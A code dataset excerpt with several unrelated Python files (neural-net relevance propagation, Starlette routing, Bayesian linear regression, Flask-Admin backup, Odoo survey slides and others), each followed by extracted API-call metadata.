Redistributed relevance going to the lower layers in the network.
"""
if isinstance(layer, (Conv1d, Conv2d, Conv3d)):
if self.conv_rule is None :
raise Exception('Model contains conv layers but the conv rule was not set !')
return self.conv_rule(layer, relevance, **kwargs)
elif isinstance(layer, (MaxPool1d, MaxPool2d, MaxPool3d)):
return max_pool_nd_inverse(layer, relevance)
elif isinstance(layer, Linear) :
if self.linear_rule is None :
raise Exception('Model contains linear layers but the linear rule was not set !')
return self.linear_rule(layer, relevance.tensor, **kwargs)
elif isinstance(layer, Upsample):
return upsample_inverse(layer, relevance)
elif isinstance(layer, torch.nn.modules.container.Sequential):
for l in layer[::-1] :
relevance = self.invert(l, relevance)
return relevance
elif type(layer) in IDENTITY_MAPPINGS :
return relevance
elif hasattr(layer, 'propagate'):
return layer.propagate(self, relevance)
else :
try :
return self.inv_funcs[type(layer)](self, layer, relevance, **kwargs)
except KeyError :
raise NotImplementedError(f'Relevance propagation not implemented for layer type {type(layer)}')
def __call__(self, layer : torch.nn.Module, relevance : torch.Tensor, **kwargs) -> torch.Tensor :
""" Wrapper for invert method """
return self.invert(layer, relevance, **kwargs)
|
[
"inverter_util.upsample_inverse",
"inverter_util.max_pool_nd_inverse",
"torch.device"
] |
[((3319, 3338), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (3331, 3338), False, 'import torch\n'), ((5821, 5858), 'inverter_util.max_pool_nd_inverse', 'max_pool_nd_inverse', (['layer', 'relevance'], {}), '(layer, relevance)\n', (5840, 5858), False, 'from inverter_util import upsample_inverse, max_pool_nd_inverse, max_pool_nd_fwd_hook, conv_nd_fwd_hook, linear_fwd_hook, upsample_fwd_hook, silent_pass\n'), ((6172, 6206), 'inverter_util.upsample_inverse', 'upsample_inverse', (['layer', 'relevance'], {}), '(layer, relevance)\n', (6188, 6206), False, 'from inverter_util import upsample_inverse, max_pool_nd_inverse, max_pool_nd_fwd_hook, conv_nd_fwd_hook, linear_fwd_hook, upsample_fwd_hook, silent_pass\n')]
|
"""
Module to take in a directory, iterate through it and create a Starlette routing map.
"""
import importlib
import inspect
from pathlib import Path
from typing import Union
from starlette.routing import Route as StarletteRoute, Mount
from nested_dict import nested_dict
from admin.route import Route
def construct_route_map_from_dict(route_dict: dict):
route_map = []
for mount, item in route_dict.items():
if inspect.isclass(item):
route_map.append(StarletteRoute(mount, item))
else:
route_map.append(Mount(mount, routes=construct_route_map_from_dict(item)))
return route_map
def create_route_map():
routes_directory = Path("admin") / "routes"
route_dict = nested_dict()
for file in routes_directory.rglob("*.py"):
import_name = f"{str(file.parent).replace('/', '.')}.{file.stem}"
route = importlib.import_module(import_name)
for _member_name, member in inspect.getmembers(route):
if inspect.isclass(member):
if issubclass(member, Route) and member != Route:
member.check_parameters()
levels = str(file.parent).split("/")[2:]
current_level = None
for level in levels:
if current_level is None:
current_level = route_dict[f"/{level}"]
else:
current_level = current_level[f"/{level}"]
if current_level is not None:
current_level[member.path] = member
else:
route_dict[member.path] = member
route_map = construct_route_map_from_dict(route_dict.to_dict())
return route_map
|
[
"importlib.import_module",
"inspect.isclass",
"nested_dict.nested_dict",
"pathlib.Path",
"starlette.routing.Route",
"inspect.getmembers"
] |
[((728, 741), 'nested_dict.nested_dict', 'nested_dict', ([], {}), '()\n', (739, 741), False, 'from nested_dict import nested_dict\n'), ((433, 454), 'inspect.isclass', 'inspect.isclass', (['item'], {}), '(item)\n', (448, 454), False, 'import inspect\n'), ((685, 698), 'pathlib.Path', 'Path', (['"""admin"""'], {}), "('admin')\n", (689, 698), False, 'from pathlib import Path\n'), ((894, 930), 'importlib.import_module', 'importlib.import_module', (['import_name'], {}), '(import_name)\n', (917, 930), False, 'import importlib\n'), ((976, 1001), 'inspect.getmembers', 'inspect.getmembers', (['route'], {}), '(route)\n', (994, 1001), False, 'import inspect\n'), ((1018, 1041), 'inspect.isclass', 'inspect.isclass', (['member'], {}), '(member)\n', (1033, 1041), False, 'import inspect\n'), ((485, 512), 'starlette.routing.Route', 'StarletteRoute', (['mount', 'item'], {}), '(mount, item)\n', (499, 512), True, 'from starlette.routing import Route as StarletteRoute, Mount\n')]
|
import numpy as np
class BayesLinearRegressor:
def __init__(self, number_of_features, alpha=1e6):
'''
:param number_of_features: Integer number of features in the training rows, excluding the intercept and output values
:param alpha: Float inverse ridge regularizaiton constant, set to 1e6
'''
# alpha is our initial guess on the variance, basically, all parameters initialized to 0 with alpha variance
# so, you know, just set it super-high. This is the same as L2 regularization, btw!
# all those weird Bayesian update rules actually amount to very standard linear algebra identities
# Once you see that it's just updating the moment matrix and the sum of squared residuals, it's straightforward!
# So those are our internal variables that everything else depends upon
self.number_of_features = number_of_features
self.alpha = alpha
self.beta_means = np.array([0] * (number_of_features + 1), dtype=np.float) # + 1 for the intercept
self.number_of_updates = 0
self.residual_sum_squares = 0
self.moment_matrix = np.eye(number_of_features + 2) * 0.0 # + 2 for the intercept and the output
self.regularization_matrix = np.eye(self.number_of_features + 1) / self.alpha
self.regularization_matrix[0, 0] = 0 # we don't regularize the intercept term
def partial_fit(self, X, Y, W=None, reverse=False):
'''
The online updating rules
:param X: Input feature vector(s) as 2D numpy array
:param Y: Input output values as 1D numpy array
:param W: Data weights (relative to unity) as a 1D numpy array
:param reverse: Boolean, True means that we "unfit" the training rows, otherwise acts as normal
:return: None
'''
# see http://www.biostat.umn.edu/~ph7440/pubh7440/BayesianLinearModelGoryDetails.pdf for gory details
# clear the frozen parameter sample since we are updating the parameter distributions
self.frozen_parameter_sample = None
moment_of_X_before = self.moment_matrix[:-1, :-1]
beta_means_before = self.beta_means.copy()
inverted_covariance_matrix_before = moment_of_X_before + self.regularization_matrix
# Here we concatenate the intercept input value (constant 1), the input vector, and the output value:
rank_n_obs_update_matrix = np.array([[1] + row + output for row, output in zip(X.tolist(), Y.tolist())])
if W is None:
moment_matrix_update_term = rank_n_obs_update_matrix.T @ rank_n_obs_update_matrix
else:
moment_matrix_update_term = rank_n_obs_update_matrix.T @ np.diag(W.tolist()) @ rank_n_obs_update_matrix
if not reverse:
self.moment_matrix += moment_matrix_update_term
moment_of_Y_update_term = Y.T @ Y
self.number_of_updates += 1
else:
self.moment_matrix -= moment_matrix_update_term
moment_of_Y_update_term = -Y.T @ Y
self.number_of_updates -= 1
moment_of_X = self.moment_matrix[:-1, :-1]
moment_of_X_and_Y = self.moment_matrix[:-1, -1]
moment_of_X_and_Y_update_term = moment_matrix_update_term[:-1, -1]
inverted_covariance_matrix = moment_of_X + self.regularization_matrix
covariance_matrix = np.linalg.inv(inverted_covariance_matrix)
# these two statements are equivalent, so I choose the simpler one, although the latter
# one is more consistent with the notation I come across in the literature
self.beta_means = covariance_matrix @ (moment_of_X_and_Y)
# self.beta_means = covariance_matrix @ (inverted_covariance_matrix_before @ beta_means_before + moment_of_X_and_Y_update_term)
if self.number_of_updates > len(covariance_matrix) - 1:
self.residual_sum_squares += (
moment_of_Y_update_term -
self.beta_means.T @ inverted_covariance_matrix @ self.beta_means +
beta_means_before.T @ inverted_covariance_matrix_before @ beta_means_before
)
def partial_unfit(self, X, Y):
return self.partial_fit(X, Y, reverse=True)
def predict(self, X, use_means=False, freeze_parameter_sample=False):
'''
:param X: Input feature vector excluding the intercept constant as a 2D numpy array
:param use_means: Boolean where True means we just provide the prediciton at the mean of the coefficients
(sometimes referred to as deterministic prediction); otherwise sample parameters from the multivariate norm
and incorporate the uncertainty of the parameters in your prediction
:param freeze_parameter_sample: Boolean. When set to True, we sample from the parameters only once for each prediction
:return:
'''
X_with_intercept = np.array([[1] + row.tolist() for row in X])
scale_multiplier = 1.0 / max(1.0, (self.number_of_updates - self.number_of_features - 1))
if use_means:
return X_with_intercept @ self.beta_means
else:
if freeze_parameter_sample:
if self.frozen_parameter_sample is not None:
self.frozen_parameter_sample = np.random.multivariate_normal(
self.beta_means.T[0],
self.residual_sum_squares * scale_multiplier * self.cov
)
beta = self.frozen_parameter_sample
else:
beta = np.random.multivariate_normal(
self.beta_means.T[0],
self.residual_sum_squares * scale_multiplier * self.cov_params
)
return X_with_intercept @ beta
@property
def coef_(self):
return self.beta_means[1:]
@property
def intercept_(self):
return float(self.beta_means[0])
@property
def cov_params(self):
scale_multiplier = 1.0 / max(1.0, (self.number_of_updates - self.number_of_features - 1))
moment_of_X = self.moment_matrix[:-1, :-1]
inverted_covariance_matrix = moment_of_X + np.eye(self.number_of_features + 1) / self.alpha
return np.linalg.inv(inverted_covariance_matrix) * self.residual_sum_squares * scale_multiplier
|
[
"numpy.eye",
"numpy.linalg.inv",
"numpy.array",
"numpy.random.multivariate_normal"
] |
[((965, 1021), 'numpy.array', 'np.array', (['([0] * (number_of_features + 1))'], {'dtype': 'np.float'}), '([0] * (number_of_features + 1), dtype=np.float)\n', (973, 1021), True, 'import numpy as np\n'), ((3376, 3417), 'numpy.linalg.inv', 'np.linalg.inv', (['inverted_covariance_matrix'], {}), '(inverted_covariance_matrix)\n', (3389, 3417), True, 'import numpy as np\n'), ((1149, 1179), 'numpy.eye', 'np.eye', (['(number_of_features + 2)'], {}), '(number_of_features + 2)\n', (1155, 1179), True, 'import numpy as np\n'), ((1263, 1298), 'numpy.eye', 'np.eye', (['(self.number_of_features + 1)'], {}), '(self.number_of_features + 1)\n', (1269, 1298), True, 'import numpy as np\n'), ((5578, 5698), 'numpy.random.multivariate_normal', 'np.random.multivariate_normal', (['self.beta_means.T[0]', '(self.residual_sum_squares * scale_multiplier * self.cov_params)'], {}), '(self.beta_means.T[0], self.\n residual_sum_squares * scale_multiplier * self.cov_params)\n', (5607, 5698), True, 'import numpy as np\n'), ((6189, 6224), 'numpy.eye', 'np.eye', (['(self.number_of_features + 1)'], {}), '(self.number_of_features + 1)\n', (6195, 6224), True, 'import numpy as np\n'), ((6253, 6294), 'numpy.linalg.inv', 'np.linalg.inv', (['inverted_covariance_matrix'], {}), '(inverted_covariance_matrix)\n', (6266, 6294), True, 'import numpy as np\n'), ((5306, 5419), 'numpy.random.multivariate_normal', 'np.random.multivariate_normal', (['self.beta_means.T[0]', '(self.residual_sum_squares * scale_multiplier * self.cov)'], {}), '(self.beta_means.T[0], self.\n residual_sum_squares * scale_multiplier * self.cov)\n', (5335, 5419), True, 'import numpy as np\n')]
|
import copy
import json
import jsonschema
import logging
import pandas as pd
import os
from sklearn.cross_validation import train_test_split
import minst.utils as utils
logger = logging.getLogger(__name__)
class MissingDataException(Exception):
pass
class Observation(object):
"""Document model each item in the collection."""
# This should use package resources :o(
SCHEMA_PATH = os.path.join(os.path.dirname(__file__), 'schema',
'observation.json')
SCHEMA = json.load(open(SCHEMA_PATH))
def __init__(self, index, dataset, audio_file, instrument, source_index,
start_time, duration, note_number=None, dynamic='',
partition=''):
"""Model definition for an instrument observation.
Parameters
----------
index :
dataset :
audio_file : str
Relative file path to an audiofile.
instrument :
source_index :
start_time :
duration :
note_number :
dynamic :
partition :
Returns
-------
obs : Observation
Populated observation
"""
self.index = index
self.dataset = dataset
self.audio_file = audio_file
self.instrument = instrument
self.source_index = source_index
self.start_time = start_time
self.duration = duration
self.note_number = note_number
self.dynamic = dynamic
self.partition = partition
def to_builtin(self):
return self.__dict__.copy()
@classmethod
def from_series(cls, series):
"""Convert a pd.Series to an Observation."""
return cls(index=series.name, **series.to_dict())
def to_series(self):
"""Convert to a flat series (ie make features a column)
Returns
-------
pandas.Series
"""
flat_dict = self.to_dict()
name = flat_dict.pop("index")
return pd.Series(data=flat_dict, name=name)
def to_dict(self):
return self.__dict__.copy()
def __getitem__(self, key):
return self.__dict__[key]
def validate(self, schema=None, verbose=False, check_files=True):
"""Returns True if valid.
"""
schema = self.SCHEMA if schema is None else schema
success = True
try:
jsonschema.validate(self.to_builtin(), schema)
except jsonschema.ValidationError as derp:
success = False
if verbose:
print("Failed schema test: \n{}".format(derp))
if success and check_files:
success &= utils.check_audio_file(self.audio_file)[0]
if not success and verbose:
print("Failed file check: \n{}".format(self.audio_file))
return success
def _enforce_obs(obs, audio_root='', strict=True):
"""Get dict from an Observation if an observation, else just dict"""
audio_file = obs['audio_file']
escaped_audio_file = os.path.join(audio_root, audio_file)
file_checks = [os.path.exists(audio_file),
os.path.exists(escaped_audio_file)]
if not any(file_checks) and strict:
raise MissingDataException(
"Audio file(s) missing:\n\tbase: {}\n\tescaped:{}"
"".format(audio_file, escaped_audio_file))
if isinstance(obs, Observation):
obs = obs.to_dict()
obs['audio_file'] = escaped_audio_file if file_checks[1] else audio_file
return obs
class Collection(object):
"""Dictionary-like collection of Observations (maintains order).
Expands relative audio files to a given `audio_root` path.
"""
# MODEL = Observation
def __init__(self, observations, audio_root='', strict=False):
"""
Parameters
----------
observations : list
List of Observations (as dicts or Observations.)
If they're dicts, this will convert them to Observations.
data_root : str or None
Path to look for an observation, if not None
"""
self._observations = [Observation(**_enforce_obs(x, audio_root,
strict))
for x in observations]
self.audio_root = audio_root
self.strict = strict
def __eq__(self, a):
is_eq = False
if hasattr(a, 'to_builtin'):
is_eq = self.to_builtin() == a.to_builtin()
return is_eq
def __len__(self):
return len(self.values())
def __getitem__(self, n):
"""Return the observation for a given integer index."""
return self._observations[n]
def items(self):
return [(v.index, v) for v in self.values()]
def values(self):
return self._observations
def keys(self):
return [v.index for v in self.values()]
def append(self, observation, audio_root=None):
audio_root = self.audio_root if audio_root is None else audio_root
obs = _enforce_obs(observation, audio_root, self.strict)
self._observations += [Observation(**obs)]
def to_builtin(self):
return [v.to_builtin() for v in self.values()]
@classmethod
def read_json(cls, json_path, audio_root=''):
with open(json_path, 'r') as fh:
return cls(json.load(fh), audio_root=audio_root)
def to_json(self, json_path=None, **kwargs):
"""Pandas-like `to_json` method.
Parameters
----------
json_path : str, or None
If given, will attempt to write JSON to disk; else returns a string
of serialized data.
**kwargs : keyword args
Pass-through parameters to the JSON serializer.
"""
sdata = json.dumps(self.to_builtin(), **kwargs)
if json_path is not None:
with open(json_path, 'w') as fh:
fh.write(sdata)
else:
return sdata
def validate(self, verbose=False, check_files=True):
"""Returns True if all are valid."""
return all([x.validate(verbose=verbose, check_files=check_files)
for x in self.values()])
def to_dataframe(self):
return pd.DataFrame([x.to_series() for x in self.values()])
@classmethod
def from_dataframe(cls, dframe, audio_root=''):
return cls([Observation.from_series(x) for _, x in dframe.iterrows()],
audio_root=audio_root)
def copy(self, deep=True):
return Collection(copy.deepcopy(self._observations))
def view(self, column, filter_value):
"""Returns a copy of the collection restricted to the filter value.
Parameters
----------
column : str
Name of the column for filtering.
filter_value : obj
Value to restrict the collection.
Returns
-------
"""
thecopy = copy.copy(self.to_dataframe())
ds_view = thecopy[thecopy[column] == filter_value]
return Collection.from_dataframe(ds_view, self.audio_root)
def load(filename, audio_root):
"""
"""
return Collection.load(filename)
def partition_collection(collection, test_set, train_val_split=0.2,
max_files_per_class=None):
"""Returns Datasets for train and validation constructed
from the datasets not in the test_set, and split with
the ratio train_val_split.
* First selects from only the datasets given in datasets.
* Then **for each instrument** (so the distribution from
each instrument doesn't change)
* train_test_split to generate training and validation sets.
* if max_files_per_class, also then restrict the training set to
a maximum of that number of files for each train and test
Parameters
----------
test_set : str
String in ["rwc", "uiowa", "philharmonia"] which selects
the hold-out-set to be used for testing.
Returns
-------
partition_df : pd.DataFrame
DataFrame with only an index to the original table, and
the partiition in ['train', 'valid', 'test']
"""
df = collection.to_dataframe()
test_df = collection.view(
column='dataset', filter_value=test_set).to_dataframe()
datasets = set(df["dataset"].unique()) - set([test_set])
search_df = df[df["dataset"].isin(datasets)]
selected_instruments_train = []
selected_instruments_valid = []
for instrument in search_df["instrument"].unique():
instrument_df = search_df[search_df["instrument"] == instrument]
if len(instrument_df) < 2:
logger.warning("Instrument {} doesn't haven enough samples "
"to split.".format(instrument))
continue
groups = instrument_df.groupby(['source_index'])
train_grps, valid_grps = train_test_split(
list(groups), test_size=train_val_split)
# Groups get backed out as (source_index, dataframe) tuples, so stick
# these back together now that they've been partitioned.
traindf = pd.concat(x[1] for x in train_grps)
validdf = pd.concat(x[1] for x in valid_grps)
if max_files_per_class:
replace = False if len(traindf) > max_files_per_class else True
traindf = traindf.sample(n=max_files_per_class,
replace=replace)
selected_instruments_train.append(traindf)
selected_instruments_valid.append(validdf)
train_df = pd.concat(selected_instruments_train)
valid_df = pd.concat(selected_instruments_valid)
# Create the final dataframe
partition = (['train'] * len(train_df) +
['valid'] * len(valid_df) +
['test'] * len(test_df))
index = (train_df.index.tolist() +
valid_df.index.tolist() +
test_df.index.tolist())
result = pd.DataFrame(partition,
columns=['partition'],
index=index)
return result
|
[
"pandas.DataFrame",
"copy.deepcopy",
"json.load",
"os.path.dirname",
"os.path.exists",
"minst.utils.check_audio_file",
"pandas.Series",
"os.path.join",
"pandas.concat",
"logging.getLogger"
] |
[((180, 207), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (197, 207), False, 'import logging\n'), ((3034, 3070), 'os.path.join', 'os.path.join', (['audio_root', 'audio_file'], {}), '(audio_root, audio_file)\n', (3046, 3070), False, 'import os\n'), ((9584, 9621), 'pandas.concat', 'pd.concat', (['selected_instruments_train'], {}), '(selected_instruments_train)\n', (9593, 9621), True, 'import pandas as pd\n'), ((9637, 9674), 'pandas.concat', 'pd.concat', (['selected_instruments_valid'], {}), '(selected_instruments_valid)\n', (9646, 9674), True, 'import pandas as pd\n'), ((9971, 10030), 'pandas.DataFrame', 'pd.DataFrame', (['partition'], {'columns': "['partition']", 'index': 'index'}), "(partition, columns=['partition'], index=index)\n", (9983, 10030), True, 'import pandas as pd\n'), ((417, 442), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (432, 442), False, 'import os\n'), ((2008, 2044), 'pandas.Series', 'pd.Series', ([], {'data': 'flat_dict', 'name': 'name'}), '(data=flat_dict, name=name)\n', (2017, 2044), True, 'import pandas as pd\n'), ((3090, 3116), 'os.path.exists', 'os.path.exists', (['audio_file'], {}), '(audio_file)\n', (3104, 3116), False, 'import os\n'), ((3137, 3171), 'os.path.exists', 'os.path.exists', (['escaped_audio_file'], {}), '(escaped_audio_file)\n', (3151, 3171), False, 'import os\n'), ((9152, 9187), 'pandas.concat', 'pd.concat', (['(x[1] for x in train_grps)'], {}), '(x[1] for x in train_grps)\n', (9161, 9187), True, 'import pandas as pd\n'), ((9206, 9241), 'pandas.concat', 'pd.concat', (['(x[1] for x in valid_grps)'], {}), '(x[1] for x in valid_grps)\n', (9215, 9241), True, 'import pandas as pd\n'), ((6558, 6591), 'copy.deepcopy', 'copy.deepcopy', (['self._observations'], {}), '(self._observations)\n', (6571, 6591), False, 'import copy\n'), ((2668, 2707), 'minst.utils.check_audio_file', 'utils.check_audio_file', (['self.audio_file'], {}), '(self.audio_file)\n', (2690, 2707), True, 'import minst.utils as utils\n'), ((5367, 5380), 'json.load', 'json.load', (['fh'], {}), '(fh)\n', (5376, 5380), False, 'import json\n')]
|
from pathlib import Path
from docs_src.importers.hfml.tutorial001 import result
def test_hfml_base():
output_fn = Path("tests") / "formatters" / "hfml" / "data" / "kangyur_base.txt"
expected = output_fn.read_text()
assert result == expected
|
[
"pathlib.Path"
] |
[((121, 134), 'pathlib.Path', 'Path', (['"""tests"""'], {}), "('tests')\n", (125, 134), False, 'from pathlib import Path\n')]
|
import array as arr
import pytz
# Owned
__project__ = "peimar"
__author__ = "<NAME>"
__license__ = "MIT"
__version__ = "0.0.4"
__date__ = "02/11/2021"
__email__ = "<<EMAIL>>"
# Inverter Web Server
inverter_server = "192.168.1.8"
inverter_port = 80
# Inverter metric decimals
cf = arr.array('I', [0, 2, 1, 2, 1, 1, 2, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 2, 1, 2, 1, 2, 1, 2, 1, 1, 1])
# Inverter timezone
timezone = pytz.timezone("Europe/Rome")
# Production time slot
start_hour = '07'
start_minute = '30'
end_hour = '19'
end_minute = '00'
dst_start_hour = '06'
dst_start_minute = '00'
dst_end_hour = '21'
dst_end_minute = '30'
# InfluxDB Connection
influxdb_host = "localhost"
influxdb_port = 8086
influxdb_repo = "peimar"
influxdb_user = "peimar"
influxdb_pwd = "<PASSWORD>"
# Log path
logdefaultpath = "/var/log/peimar/default.log"
loginfopath = "/var/log/peimar/info.log"
|
[
"array.array",
"pytz.timezone"
] |
[((284, 406), 'array.array', 'arr.array', (['"""I"""', '[0, 2, 1, 2, 1, 1, 2, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 2,\n 1, 2, 1, 2, 1, 2, 1, 1, 1]'], {}), "('I', [0, 2, 1, 2, 1, 1, 2, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,\n 2, 2, 2, 0, 2, 1, 2, 1, 2, 1, 2, 1, 1, 1])\n", (293, 406), True, 'import array as arr\n'), ((435, 463), 'pytz.timezone', 'pytz.timezone', (['"""Europe/Rome"""'], {}), "('Europe/Rome')\n", (448, 463), False, 'import pytz\n')]
|
import os
from sqlalchemy.exc import IntegrityError, InvalidRequestError
from .backup import Backup
from .serializer import Serializer
from .autoclean import BackupAutoClean
from .mixins import AdminBackupModelViewMixin
from .fileadmin import BackupFileAdmin
class FlaskAdminBackup:
def __init__(self, app=None, db=None, admin=None):
if app is not None:
self.init_app(app)
def init_app(self, app, db=None, admin=None, backup=None, serializer=None):
if not hasattr(app, 'extensions'):
app.extensions = {}
app.extensions['flask-admin-backup'] = self
app.config.setdefault('ADMIN_BACKUP_FOLDER_NAME', 'databackup')
app.config.setdefault('ADMIN_BACKUP_PATH', os.getcwd())
app.config.setdefault('ADMIN_BACKUP_PREFIX', 'db-bkp')
app.config.setdefault('ADMIN_BACKUP_FILEADMIN_NAME', 'Backup')
self.app = app
self.db = db
self.fileadmin_name = self.app.config['ADMIN_BACKUP_FILEADMIN_NAME']
self.prefix = self.app.config['ADMIN_BACKUP_PREFIX']
self.folder_path = os.path.join(
self.app.config['ADMIN_BACKUP_PATH'],
self.app.config['ADMIN_BACKUP_FOLDER_NAME'])
self.backup = backup or Backup(
path=self.folder_path, prefix=self.prefix)
self.target = self.backup.get_target()
self.serializer = serializer or Serializer(db=db)
if admin:
self.add_file_view(admin)
def add_file_view(self, admin):
admin.add_view(BackupFileAdmin(
self.folder_path,
name=self.fileadmin_name))
def create(self, class_name, contents):
"""备份数据
:param class_name: str,
:param contents: list,
:return: bool
"""
data = self.serializer.dump_data(contents)
filename = self.backup.generate_name(class_name) # 生成文件名称
full_path = self.target.create_file(filename, data)
rows = len(self.serializer.load_data(data))
if full_path:
print('==> {} rows from {} saved as {}'.format(
rows, class_name, full_path))
return True
else:
print('==> Error creating {} at {}'.format(
filename, self.target.path))
return False
def restore(self, path):
"""恢复数据
:param path: 备份文件路径
"""
contents = self.target.read_file(path)
successes = []
fails = []
db = self.db
rows = self.serializer.load_data(contents)
for row in rows:
try:
db.session.merge(row) # 使用了 db.session.merge
db.session.commit() # 是否可以换成 flush ?
successes.append(row)
except (IntegrityError, InvalidRequestError):
db.session.rollback()
fails.append(row)
return successes, fails
def autoclean(self):
"""
Remove a series of backup files based on the following rules:
* Keeps all the backups from the last 7 days
* Keeps the most recent backup from each week of the last month
* Keeps the most recent backup from each month of the last year
* Keeps the most recent backup from each year of the remaining years
"""
backup = self.backup
backup.files = tuple(backup.target.get_files())
if not backup.files:
print('==> No backups found.')
return None
cleaning = BackupAutoClean(backup.get_timestamps())
white_list = cleaning.white_list
black_list = cleaning.black_list
if not black_list:
print('==> No backup to be deleted.')
return None
|
[
"os.getcwd",
"os.path.join"
] |
[((1090, 1190), 'os.path.join', 'os.path.join', (["self.app.config['ADMIN_BACKUP_PATH']", "self.app.config['ADMIN_BACKUP_FOLDER_NAME']"], {}), "(self.app.config['ADMIN_BACKUP_PATH'], self.app.config[\n 'ADMIN_BACKUP_FOLDER_NAME'])\n", (1102, 1190), False, 'import os\n'), ((733, 744), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (742, 744), False, 'import os\n')]
|
import numpy as np
class Camera(object):
"""Camera is a simple finite pinhole camera defined by the matrices K, R
and t.
see "Multiple View Geometry in Computer Vision" by <NAME> and <NAME> for notation.
Parameters
----------
K: The 3x3 intrinsic camera parameters
R: The 3x3 rotation matrix from world to camera coordinates
t: The 3x1 translation vector for the camera center in camera coordinates
(so that the camera center is the origin in the camera coordinates)
"""
def __init__(self, K, R, t):
# Make sure the input data have the right shape
assert K.shape == (3, 3)
assert R.shape == (3, 3)
assert t.shape == (3, 1)
self._K = K
self._R = R
self._t = t
self._P = None
self._P_pinv = None
self._center = None
@property
def K(self):
return self._K
@property
def R(self):
return self._R
@property
def t(self):
return self._t
@property
def center(self):
# Compute the center of the camera in homogenous coordinates and return
# it as a 4x1 vector
if self._center is None:
self._center = np.vstack(
[(-np.linalg.inv(self.R)).dot(self.t), [1]]
).astype(np.float32)
assert self._center.shape == (4, 1)
return self._center
@property
def P(self):
# Compute and return a 3x4 projection matrix
if self._P is None:
self._P = self._K.dot(np.hstack([self._R, self._t]))
return self._P
@property
def P_pinv(self):
if self._P_pinv is None:
self._P_pinv = np.linalg.pinv(self.P)
return self._P_pinv
|
[
"numpy.linalg.inv",
"numpy.linalg.pinv",
"numpy.hstack"
] |
[((1711, 1733), 'numpy.linalg.pinv', 'np.linalg.pinv', (['self.P'], {}), '(self.P)\n', (1725, 1733), True, 'import numpy as np\n'), ((1560, 1589), 'numpy.hstack', 'np.hstack', (['[self._R, self._t]'], {}), '([self._R, self._t])\n', (1569, 1589), True, 'import numpy as np\n'), ((1263, 1284), 'numpy.linalg.inv', 'np.linalg.inv', (['self.R'], {}), '(self.R)\n', (1276, 1284), True, 'import numpy as np\n')]
|
SRC = """
---
- - college
- -380608299.3165369
- closely: 595052867
born: false
stomach: true
expression: true
chosen: 34749965
somebody: false
- positive
- true
- false
- price
- 2018186817
- average
- young
- -1447308110
"""
import ryaml
for _ in range(1000):
ryaml.loads(SRC)
|
[
"ryaml.loads"
] |
[((299, 315), 'ryaml.loads', 'ryaml.loads', (['SRC'], {}), '(SRC)\n', (310, 315), False, 'import ryaml\n')]
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
class SlidePartnerRelation(models.Model):
_inherit = 'slide.slide.partner'
user_input_ids = fields.One2many('survey.user_input', 'slide_partner_id', 'Certification attempts')
survey_quizz_passed = fields.Boolean('Certification Quizz Passed', compute='_compute_survey_quizz_passed', store=True)
@api.depends('partner_id', 'user_input_ids.quizz_passed')
def _compute_survey_quizz_passed(self):
passed_user_inputs = self.env['survey.user_input'].sudo().search([
('slide_partner_id', 'in', self.ids),
('quizz_passed', '=', True)
])
passed_slide_partners = passed_user_inputs.mapped('slide_partner_id')
for record in self:
record.survey_quizz_passed = record in passed_slide_partners
@api.model_create_multi
def create(self, vals_list):
res = super(SlidePartnerRelation, self).create(vals_list)
completed = res.filtered('survey_quizz_passed')
if completed:
completed.write({'completed': True})
return res
def _write(self, vals):
res = super(SlidePartnerRelation, self)._write(vals)
if vals.get('survey_quizz_passed'):
self.sudo().write({'completed': True})
return res
class Slide(models.Model):
_inherit = 'slide.slide'
slide_type = fields.Selection(selection_add=[('certification', 'Certification')])
survey_id = fields.Many2one('survey.survey', 'Certification')
nbr_certification = fields.Integer("Number of Certifications", compute='_compute_slides_statistics', store=True)
_sql_constraints = [
('check_survey_id', "CHECK(slide_type != 'certification' OR survey_id IS NOT NULL)", "A slide of type 'certification' requires a certification."),
('check_certification_preview', "CHECK(slide_type != 'certification' OR is_preview = False)", "A slide of type certification cannot be previewed."),
]
@api.onchange('survey_id')
def _on_change_survey_id(self):
if self.survey_id:
self.slide_type = 'certification'
@api.model
def create(self, values):
rec = super(Slide, self).create(values)
if rec.survey_id:
rec.slide_type = 'certification'
return rec
def _generate_certification_url(self):
""" get a map of certification url for certification slide from `self`. The url will come from the survey user input:
1/ existing and not done user_input for member of the course
2/ create a new user_input for member
3/ for no member, a test user_input is created and the url is returned
Note: the slide.slides.partner should already exist
We have to generate a new invite_token to differentiate pools of attempts since the
course can be enrolled multiple times.
"""
certification_urls = {}
for slide in self.filtered(lambda slide: slide.slide_type == 'certification' and slide.survey_id):
if slide.channel_id.is_member:
user_membership_id_sudo = slide.user_membership_id.sudo()
if user_membership_id_sudo.user_input_ids:
last_user_input = next(user_input for user_input in user_membership_id_sudo.user_input_ids.sorted(
lambda user_input: user_input.create_date, reverse=True
))
certification_urls[slide.id] = last_user_input._get_survey_url()
else:
user_input = slide.survey_id.sudo()._create_answer(
partner=self.env.user.partner_id,
check_attempts=False,
**{
'slide_id': slide.id,
'slide_partner_id': user_membership_id_sudo.id
},
invite_token=self.env['survey.user_input']._generate_invite_token()
)
certification_urls[slide.id] = user_input._get_survey_url()
else:
user_input = slide.survey_id.sudo()._create_answer(
partner=self.env.user.partner_id,
check_attempts=False,
test_entry=True, **{
'slide_id': slide.id
}
)
certification_urls[slide.id] = user_input._get_survey_url()
return certification_urls
|
[
"odoo.fields.Selection",
"odoo.fields.Many2one",
"odoo.fields.Integer",
"odoo.api.onchange",
"odoo.api.depends",
"odoo.fields.One2many",
"odoo.fields.Boolean"
] |
